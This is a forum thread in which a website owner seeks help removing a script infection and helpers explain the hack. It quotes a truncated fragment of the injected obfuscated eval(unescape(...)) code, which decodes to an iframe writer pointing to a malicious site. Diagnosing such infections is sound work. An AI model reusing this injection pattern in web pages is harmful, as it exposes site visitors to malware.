I have a website that has this virus. I have no idea what to do. I thought I had deleted the infected files. Any one know what to do?
you should post the address of that site - breaking the link by replacing http with hxxp . Otherwise there’s not much we could tell ???
Generally, avast detection is accurate in these cases.
Isn’t it an encrypted/obfuscated script or iframe?
Wasn’t the site hacked?
Maybe you could contact its webmaster.
Check here how to clean and make a website secure.
the site is hxxp://plasticsurgeryofutah.com
I have the Free version of Avast and it wont give me the whole name or location of the bug… I checked my index page as well as some others to find some suspicious javascript or iframes, or anything else, but with no luck.
I actually deleted several files that had the virus in them (I think), but AVAST still says the virus is still there. I just don’t know how to find it. The website hxxp://www.unmaskparasites.com/ says that there is a suspisious script “eval(unescape(”%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D…" which I cant find (even just the keyword eval) in my code.
Is there a chance I did delete it and avast and this “unmask” site are just using a cached version of the site or something like that? I just can’t figure it out.
Any help would be greatly appreciated.
I suggest you use MalwareByte’s Antimalware.
Clean your browser cache and temporary files with ATF Cleaner or CCleaner (slim version).
You’re site appears to have been hacked, the large chunk of obfuscated javascript on a single line just before the closing Body tag, see image1, I have broken the single line to make it easier to see.
avast isn’t alone in finding the home page infected, see http://www.virustotal.com/analisis/c4a376a993d00182db3bc0a49bd93b33043c83bd1165d2ddfc683e242219381f-1273716502, results of a scan of the actual page displayed.
See image2 of the obfuscated script having been decoded, shows it creates an iframe tag that points to a malicious site, see image3, which will be run code in the in.php page it goes to…
Do you use a content management software to create pages dynamically (php, sql, etc.) ?
If so it is possible that your templates are what have been hacked.